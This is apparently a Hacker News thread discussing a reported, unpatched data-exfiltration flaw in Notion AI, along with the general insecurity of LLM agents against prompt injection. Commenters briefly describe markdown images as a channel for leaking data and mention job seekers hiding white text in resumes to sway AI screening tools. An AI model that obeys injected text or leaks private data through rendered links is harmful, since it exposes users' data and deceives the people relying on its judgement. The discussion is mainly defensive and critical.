Notion AI: Unpatched data exfiltration

(promptarmor.com)

206 points by takira30 days ago

13 comments

rdli30 days ago
Securing LLMs is just structurally different. The attack space is "the entirety of the human written language" which is effectively infinite. Wrapping your head around this is something we're only now starting to appreciate.In general, treating LLM outputs (no matter where) as untrusted, and ensuring classic cybersecurity guardrails (sandboxing, data permissioning, logging) is the current SOTA on mitigation. It'll be interesting to see how approaches evolve as we figure out more.
- Barrin9230 days ago
 Dijkstra, On the Foolishness of "natural language programming":[...]It may be illuminating to try to imagine what would have happened if, right from the start our native tongue would have been the only vehicle for the input into and the output from our information processing equipment. My considered guess is that history would, in a sense, have repeated itself, and that computer science would consist mainly of the indeed black art how to bootstrap from there to a sufficiently well-defined formal system. We would need all the intellect in the world to get the interface narrow enough to be usable,[...]If only we had a way to tell a computer precisely what we want it to do...<a href="https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667.html" rel="nofollow">https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667...</a>
- kahnclusions30 days ago
 I’m not convinced LLMs can ever be secured, prompt injection isn’t going away since it’s a fundamental part of how an LLM works. Tokens in, tokens out.
- vmg1230 days ago
 It's pretty simple, don't give llms access to anything that you can't afford to expose. You treat the llm as if it was the user.
 - solid_fuel29 days ago
 > You treat the llm as if it was the user.That's not sufficient. If a user copies customer data into a public google sheet, I can reprimand and otherwise restrict the user. An LLM cannot be held accountable, and cannot learn from mistakes.
 - rdli30 days ago
 I get that but just not entirely obvious how you do that for the Notion AI.
 - embedding-shape30 days ago
 Don't use AI/LLMs that have unfettered access to everything?Feels like the question is "How do I prevent unauthenticated and anonymous users to use my endpoint that doesn't have any authentication and is on the public internet?", which is the wrong question.
 - whateveracct29 days ago
 exactly?
- solid_fuel29 days ago
 It's structurally impossible. LLMs, at their core, take trusted system input (the prompt) and multiply it against untrusted input from the users and the internet at large. There is no separation between the two, and there cannot be with the way LLMs work. They will always be vulnerable to prompt injection and manipulation.The _only_ way to create a reasonably secure system that incorporates an LLM is to treat the LLM output as completely untrustworthy in all situations. All interactions must be validated against a security layer and any calls out of the system must be seen as potential data leaks - including web searches, GET requests, emails, anything.You can still do useful things under that restriction but a lot of LLM tooling doesn't seem to grasp the fundamental security issues at play.
- jcims30 days ago
 As multi-step reasoning and tool use expand, they effectively become distinct actors in the threat model. We have no idea how many different ways the alignment of models can be influenced by the context (the anthropic paper on subliminal learning [1] was a bit eye opening in this regard) and subsequently have no deterministic way to protect it.1 - <a href="https://alignment.anthropic.com/2025/subliminal-learning/" rel="nofollow">https://alignment.anthropic.com/2025/subliminal-learning/</a>
 - zbentley29 days ago
 I’d argue they’re only distinct actors in the threat model as far as where they sit (within which perimeters), not in terms of how they behave.We already have another actor in the threat model that behaves equivalently as far as determinism/threat risk is concerned: human users.Issue is, a lot of LLM security work assumes they function like programs. They don’t. They function like humans, but run where programs run.
brimtown30 days ago
This is @simonw’s Lethal Trifecta [1] again - access to private data and untrusted input are arguably the purpose of enterprise agents, so any external communication is unsafe. Markdown images are just the ones people usually forget about[1] <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/" rel="nofollow">https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/</a>
- Miyamura8030 days ago
 Good point around the markdown image as an untrusted vector. Lethal trifecta is determnistically preventable, it really should be addressed wider in the indutry
falloutx30 days ago
People have learnt a little while back that you need to use the white hidden text in a resume to make the AI recommend you, There are also resume collecting services which let you buy a set of resumes belonging to your general competition era and you can compare your ai results with them. Its an arms race to get called up for a job interview at the moment.
- AdieuToLogic30 days ago
 > People have learnt a little while back that you need to use the white hidden text in a resume to make the AI recommend you ...I would caution against using "white hidden text" within PDF resumes as all an ATS[0] need use in order to make hidden text the same as any other text is preprocess with the poppler[1] project's `pdftotext`. Sophisticated ATS[0] offerings could also use `pdftotext` in a fraud detection role with other document formats as well.0 - <a href="https://en.wikipedia.org/wiki/Applicant_tracking_system" rel="nofollow">https://en.wikipedia.org/wiki/Applicant_tracking_system</a>1 - <a href="https://poppler.freedesktop.org/" rel="nofollow">https://poppler.freedesktop.org/</a>
- Terr_30 days ago
 I wouldn't be surprised if people tried to document what LLMs different companies/vendors are using, in order to take advantage of model-biases.<a href="https://nyudatascience.medium.com/language-models-often-favor-their-own-text-revealing-a-new-bias-in-ai-e6f7a8fa5959" rel="nofollow">https://nyudatascience.medium.com/language-models-often-favo...</a>
noleary30 days ago
> We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as `Not Applicable`”.
- hxugufjfjf30 days ago
  As much as I love using Notion, they have a terrible track record when it comes to dealing with and responding to security issues.
someguyiguess30 days ago
Wow what a coincidence. I just migrated from notion to obsidian today. Looks like I timed it perfectly (or maybe slightly too late?)
- dtkav30 days ago
 How was the migration process?I work on a plugin that makes Obsidian real-time collaborative (relay.md), so if the migration is smooth I wonder how close we are to Obsidian being a suitable Notion replacement for small teams.
 - crashabr30 days ago
 I've been waiting for Logseq DB to come out to replace Google docs for my team. So your offering is interesting, but1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and2) Don't you expect to be sherlocked by the obsidian team?
 - dtkav29 days ago
 In Obsidian you can have transclusions which is basically an embed of a section of another note. It isn't perfect, but worth looking into.Regarding getting sherlocked; Obsidian does have realtime collaboration on their roadmap. There are likely to be important differences in approach, though.Our offering is available now and we're learning a ton about what customers want.If anything, I'd actually love to work more closely with them. They are a huge inspiration in how to build a business and are around the state of the art of a philosophy of software.I'm interested in combining the unix philosophy with native collaboration (with both LLMs and other people).That vision is inherently collaborative, anti lock-in, and also bigger than Obsidian. The important lasting part is the graph-of-local-files, not the editor (though Obsidian is fantastic).
 - embedding-shape30 days ago
 > 1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) andMore or less yes, embeddable templates basically gives you that out of the box, Obsidian "Bases" let you query them.> 2) Don't you expect to be sherlocked by the obsidian team?I seem to remember that someone from the team once said they have no interest in building "real-time" collaboration features, but I might misremember and I cannot find it now.And after all, Obsidian is a for-profit company who can change their mind, so as long as you don't try to build your own for-profit business on top of a use case that could be sherlocked, I think they're fine.
 - dtkav29 days ago
 From their roadmap page:> Multiplayer > > Share notes and edit them collaboratively<a href="https://obsidian.md/roadmap" rel="nofollow">https://obsidian.md/roadmap</a>
 embedding-shape29 days ago
 Doesn't say real-time there though? But yeah, must be what they mean, because you can in theory already collaborate on notes, via their "Sync", although it sucks for real-time collaboration.
 - someguyiguess21 days ago
 Sorry for the late reply. The migration was really easy actually. I used the official migration plugin. There were a few things it couldn’t transfer over though (voice transcription notes)
 - dtkav20 days ago
 Very helpful, thank you.
airstrike30 days ago
IMHO the problem really comes from the browser accessing the URL without explicit user permission.Bring back desktop software.
- embedding-shape30 days ago
 Meh, bring back thinking of security regardless of the platform instead. The web is gonna stay, might as well wish for people to treat the security on the platform better.
jonplackett30 days ago
Sloppy coding to know a link could be a problem and render it anyway. But even worse to ignore the person who tells you you did that.
digiown30 days ago
Any data that leaves the machines you control, especially to a service like Notion, is already "exfiltrated" anyway. Never trust any consumer grade service without an explicit contract for any important data you don't want exfiltrated. They will play fast and loose with your data, since there is so little downside.
dcreater30 days ago
One more reason not to use Notion.I wonder when there will be awakening to not use SaaS for everything you do. And the sad thing is that this is the behavior of supposedly tech-savvy people in places like the bay area.I think the next wave is going to be native apps, with a single purchase model - the way things used to be. AI is going to enable devs, even indie devs, to make such products.
- bossyTeacher30 days ago
 > I think the next wave is going to be native appselaborate please?
 - dcreater29 days ago
 The reason web apps and electron based apps became the de facto standard was that it removed the pain of building separately for each platform. A cost that understandably devs and companies want to avoid. Many years of this phenomenon also meant that TS/JS skills are widely available in the market but C/Swift etc. are relatively rare. LLMs completely upend this status quo as they can write in whatever language you want them to and perhaps more powerfully, can rewrite any app into whatever target language you want at effectively 0 cost/time. So a dev can decide to write in Swift for mac and ask LLMs to make a Windows version and so forth.
jerryShaker30 days ago
Unfortunate that Notion does not seem to be taking AI security more seriously, even after they got flak for other data exfil vulns in the 3.0 agents release in September
jrm430 days ago
This, of course, more yelling into the void from decades ago, but companies who promise or imply "safety around your data" and fail should be proportionally punished, and we as a society have not yet effectively figured out how to do that yet. Not sure what it will take.
- pluralmonad30 days ago
 Its perfectly figured out, people just refuse to implement the solution. Stop giving your resources to the bad actors. The horrible behavior so many enable in order to not be inconvenienced is immense.
 - jrm429 days ago
 Perfectly? No. No. A million times no.You're getting downvoted because "stop giving your resources to the bad actors" is not even remotely close to a viable solution. There is no opting out in a meaningful way.NOW, that being said. People like you and me should absolutely opt out to the extent that we can, but with the understanding that this is "for show," in a good way.
mirekrusin30 days ago
Public disclosure date is Jan 2025, but should be Jan 2026.